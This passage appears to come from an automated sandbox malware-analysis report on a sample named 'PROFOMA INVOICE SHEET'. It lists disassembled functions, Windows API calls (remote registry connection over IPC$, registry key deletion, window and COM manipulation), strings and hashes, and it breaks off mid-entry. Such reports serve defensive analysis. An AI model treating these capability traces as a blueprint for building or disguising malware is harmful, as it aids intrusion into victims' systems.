                                    • String ID: %s%u
                                    • API String ID: 4010501982-679674701
                                    • Opcode ID: 004ce61b002a1a6cb13c15dd23759c0a94913bb66a75be431ba9cb09ffebf4ed
                                    • Instruction ID: 24b0c1145067998114da21742528206a2c2a5a899d9592a06d7b47aebe35279f
                                    • Opcode Fuzzy Hash: 004ce61b002a1a6cb13c15dd23759c0a94913bb66a75be431ba9cb09ffebf4ed
                                    • Instruction Fuzzy Hash: 8991A071204706AFD71ADF24C885BEAF7E8FF44350F008529F99AD6194DB30EA55CB91
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00364994
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 003649DA
                                    • _wcslen.LIBCMT ref: 003649EB
                                    • CharUpperBuffW.USER32(?,00000000), ref: 003649F7
                                    • _wcsstr.LIBVCRUNTIME ref: 00364A2C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00364A64
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00364A9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00364AE6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00364B20
                                    • GetWindowRect.USER32(?,?), ref: 00364B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                    • String ID: ThumbnailClass
                                    • API String ID: 1311036022-1241985126
                                    • Opcode ID: 79ddcd6c3467c10eba0f5dca5173c026b6a4c7a286d3fc2ff1ed85aa182786f7
                                    • Instruction ID: 517c15bd8835f5db5f7c55519a920c2bbdfe8402cbe707decd7e029445e20c77
                                    • Opcode Fuzzy Hash: 79ddcd6c3467c10eba0f5dca5173c026b6a4c7a286d3fc2ff1ed85aa182786f7
                                    • Instruction Fuzzy Hash: A791AD31808205AFDB06DF14C985BAA77E8FF84714F04846AFD859B19AEB30ED45CBA1
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0038CC64
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0038CC8D
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0038CD48
                                      • Part of subcall function 0038CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0038CCAA
                                      • Part of subcall function 0038CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0038CCBD
                                      • Part of subcall function 0038CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0038CCCF
                                      • Part of subcall function 0038CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0038CD05
                                      • Part of subcall function 0038CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0038CD28
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0038CCF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2734957052-4033151799
                                    • Opcode ID: 9e56dca81c5f0bcf76c5d59a63b9dcd27c4e970a7b21e079d86965db0d54ae85
                                    • Instruction ID: a39b60dc160f144c5e2ce23dce2765d405ce66b9f7dfc9a37c9851035d801382
                                    • Opcode Fuzzy Hash: 9e56dca81c5f0bcf76c5d59a63b9dcd27c4e970a7b21e079d86965db0d54ae85
                                    • Instruction Fuzzy Hash: 5C318071911228BBDB22AB55DC88EFFBB7CEF45740F0111A6E906E3240D6309E49DBB0
                                    APIs
                                    • timeGetTime.WINMM ref: 0036E6B4
                                      • Part of subcall function 0031E551: timeGetTime.WINMM(?,?,0036E6D4), ref: 0031E555
                                    • Sleep.KERNEL32(0000000A), ref: 0036E6E1
                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0036E705
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0036E727
                                    • SetActiveWindow.USER32 ref: 0036E746
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0036E754
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0036E773
                                    • Sleep.KERNEL32(000000FA), ref: 0036E77E
                                    • IsWindow.USER32 ref: 0036E78A
                                    • EndDialog.USER32(00000000), ref: 0036E79B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: a50a26e3ddac7d02dc52126e035238b9389729442e2d94f2aff93b438f00ff76
                                    • Instruction ID: 45c9cc7588ee161c590a882f9d39803b9b6cb3b56702acf846291f018c6e5626
                                    • Opcode Fuzzy Hash: a50a26e3ddac7d02dc52126e035238b9389729442e2d94f2aff93b438f00ff76
                                    • Instruction Fuzzy Hash: 9A21C3B8210301AFEB035F64FC89A263B6DFB65348F109427F841821A5DBB2EC088B24
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0036EA5D
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0036EA73
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036EA84
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0036EA96
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0036EAA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: SendString$_wcslen
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2420728520-1007645807
                                    • Opcode ID: 8da4ed1ec82e2c3a5822b37a9dc5d8dd43924b9d37319ab00be95c9b0bf4dbd5
                                    • Instruction ID: d93387462f3759599a8101c1e55ea7de258174a34a425eab17ffa38afee6907c
                                    • Opcode Fuzzy Hash: 8da4ed1ec82e2c3a5822b37a9dc5d8dd43924b9d37319ab00be95c9b0bf4dbd5
                                    • Instruction Fuzzy Hash: 4C11A035A9125979D722A7A5DD5BEFF6A7CEFD1B00F00042AB801E60D5EFB00E08C6B0
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 00365CE2
                                    • GetWindowRect.USER32(00000000,?), ref: 00365CFB
                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00365D59
                                    • GetDlgItem.USER32(?,00000002), ref: 00365D69
                                    • GetWindowRect.USER32(00000000,?), ref: 00365D7B
                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00365DCF
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365DDD
                                    • GetWindowRect.USER32(00000000,?), ref: 00365DEF
                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00365E31
                                    • GetDlgItem.USER32(?,000003EA), ref: 00365E44
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00365E5A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00365E67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: a20530e96ebe5ca1fc579395b646805a907f05e85de945310fc096d648ef0908
                                    • Instruction ID: 854eda2fc0d2bfc4e16c4771ba8e8113d297ab3344db88b2aed3fcde48f16fe0
                                    • Opcode Fuzzy Hash: a20530e96ebe5ca1fc579395b646805a907f05e85de945310fc096d648ef0908
                                    • Instruction Fuzzy Hash: 0A512E71B10605AFDF19CFA8CD89AAEBBB9FB48300F548129F515E7294D7719E00CB60
                                    APIs
                                      • Part of subcall function 00318F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00318BE8,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318FC5
                                    • DestroyWindow.USER32(?), ref: 00318C81
                                    • KillTimer.USER32(00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318D1B
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00356973
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 003569A1
                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 003569B8
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00318BBA,00000000), ref: 003569D4
                                    • DeleteObject.GDI32(00000000), ref: 003569E6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    • Opcode ID: 76bea65e06362e1b362ff8d8ad80c800c81057a14240b9155362e8ab3037bf25
                                    • Instruction ID: 7cfc78ddff563337b7cdc83b51910e0d0b296703e510c57c7f95dead1806e903
                                    • Opcode Fuzzy Hash: 76bea65e06362e1b362ff8d8ad80c800c81057a14240b9155362e8ab3037bf25
                                    • Instruction Fuzzy Hash: 9561AC31502600EFCB2B8F14E959BA5B7F9FB48312F55451AE4429BA70CB32ACC4CF98
                                    APIs
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    • GetSysColor.USER32(0000000F), ref: 00319862
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: d5eee4fe0d59ffa6e4a80a9e0b99e18a66a93d25542066a4d795ac5159ac1dd8
                                    • Instruction ID: da99c904b70a31748fd81c37d7d2f49a32951db77357cfcd0255f094047fb327
                                    • Opcode Fuzzy Hash: d5eee4fe0d59ffa6e4a80a9e0b99e18a66a93d25542066a4d795ac5159ac1dd8
                                    • Instruction Fuzzy Hash: 04418F31104640AFDB265F389C98BFA3BA9BB0A731F154617F9A28B1E1D7319C82DB11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .2
                                    • API String ID: 0-1634799438
                                    • Opcode ID: 30db5770d1c83ccdbaf4fe98ecfbfc0ceea2fd7673df9b0c7958933ae6546ee8
                                    • Instruction ID: 3b531becc4477c0f2590aa556f42e312cc28238d8734bc9a5278208467fe7057
                                    • Opcode Fuzzy Hash: 30db5770d1c83ccdbaf4fe98ecfbfc0ceea2fd7673df9b0c7958933ae6546ee8
                                    • Instruction Fuzzy Hash: A6C1F374904349EFCB17DFA8E881BADBBB8AF0A310F15419AF455AB392C7758941CF60
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0034F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00369717
                                    • LoadStringW.USER32(00000000,?,0034F7F8,00000001), ref: 00369720
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0034F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00369742
                                    • LoadStringW.USER32(00000000,?,0034F7F8,00000001), ref: 00369745
                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00369866
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 747408836-2268648507
                                    • Opcode ID: 62b339d52275f1c2ae14105786e272ace97e38806d3ee34266dae3bb9ee301a6
                                    • Instruction ID: b9515b0a36cccd20eead479c62555004b446711674f4cee9ea23d789d0091f3b
                                    • Opcode Fuzzy Hash: 62b339d52275f1c2ae14105786e272ace97e38806d3ee34266dae3bb9ee301a6
                                    • Instruction Fuzzy Hash: 1D412D72901209AACF06EBE0DD97EEE777CAF14340F504066F605BA096EB356F48CB61
                                    APIs
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003607A2
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003607BE
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003607DA
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00360804
                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0036082C
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00360837
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0036083C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 323675364-22481851
                                    • Opcode ID: 2a2c39f66730efdb89e2f187c6d215fb89248825cfce44d2d8df8e72b5cadcbf
                                    • Instruction ID: 85eb4cdc3d2af598bc46c8d77fc4a1c14f6b11ad3f0708ffeb5662619357b2f9
                                    • Opcode Fuzzy Hash: 2a2c39f66730efdb89e2f187c6d215fb89248825cfce44d2d8df8e72b5cadcbf
                                    • Instruction Fuzzy Hash: 9D412D72D11229ABCF16EFA4DC96DEEB778FF04350F054169E901A71A1EB309E44CB90
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00383C5C
                                    • CoInitialize.OLE32(00000000), ref: 00383C8A
                                    • CoUninitialize.OLE32 ref: 00383C94
                                    • _wcslen.LIBCMT ref: 00383D2D
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00383DB1
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00383ED5
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00383F0E
                                    • CoGetObject.OLE32(?,00000000,0039FB98,?), ref: 00383F2D
                                    • SetErrorMode.KERNEL32(00000000), ref: 00383F40
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00383FC4
                                    • VariantClear.OLEAUT32(?), ref: 00383FD8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                    • String ID:
                                    • API String ID: 429561992-0
                                    • Opcode ID: 02bcbf4cc9341070beaadce536fe5b285c0228e28c28be253dee4948a96361b0
                                    • Instruction ID: 72d40b709e0cc4d0bbf65527acb2536bed94c1fe1a40af4e51299107d99d5d41
                                    • Opcode Fuzzy Hash: 02bcbf4cc9341070beaadce536fe5b285c0228e28c28be253dee4948a96361b0
                                    • Instruction Fuzzy Hash: 88C125716083059FD702EF68C88492BB7E9FF89B44F10499DF98A9B251D731EE05CB92
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 00377AF3
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00377B8F
                                    • SHGetDesktopFolder.SHELL32(?), ref: 00377BA3
                                    • CoCreateInstance.OLE32(0039FD08,00000000,00000001,003C6E6C,?), ref: 00377BEF
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00377C74
                                    • CoTaskMemFree.OLE32(?,?), ref: 00377CCC
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00377D57
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00377D7A
                                    • CoTaskMemFree.OLE32(00000000), ref: 00377D81
                                    • CoTaskMemFree.OLE32(00000000), ref: 00377DD6
                                    • CoUninitialize.OLE32 ref: 00377DDC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                    • String ID:
                                    • API String ID: 2762341140-0
                                    • Opcode ID: 018b5c4166d026c714b42076eba132910a2039a6bda5f8b4213643871183f84a
                                    • Instruction ID: ae1a36c33b7e62b165f1a5eb45a94dde438d171bd5c102d73beb2ced6ae093b9
                                    • Opcode Fuzzy Hash: 018b5c4166d026c714b42076eba132910a2039a6bda5f8b4213643871183f84a
                                    • Instruction Fuzzy Hash: 2DC12A75A04209AFCB15DFA4C894DAEBBF9FF48304B148499E81ADB361D735EE41CB90
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00395504
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00395515
                                    • CharNextW.USER32(00000158), ref: 00395544
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00395585
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0039559B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003955AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$CharNext
                                    • String ID:
                                    • API String ID: 1350042424-0
                                    • Opcode ID: 813be5b66fba9912c82226d82e1c3f9c410aeb5bd4e19a08686c6d1779d62940
                                    • Instruction ID: 6d8d4c3e12e48c30d5e4ed68a81fc7adcf556d69991a0a9e9fbc1d72a6794d71
                                    • Opcode Fuzzy Hash: 813be5b66fba9912c82226d82e1c3f9c410aeb5bd4e19a08686c6d1779d62940
                                    • Instruction Fuzzy Hash: 5361BD31904608EFDF138F91CC849FE7BB9EB0A721F114146F925AB291D7709AC0DB60
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0035FAAF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0035FB08
                                    • VariantInit.OLEAUT32(?), ref: 0035FB1A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0035FB3A
                                    • VariantCopy.OLEAUT32(?,?), ref: 0035FB8D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0035FBA1
                                    • VariantClear.OLEAUT32(?), ref: 0035FBB6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0035FBC3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035FBCC
                                    • VariantClear.OLEAUT32(?), ref: 0035FBDE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035FBE9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
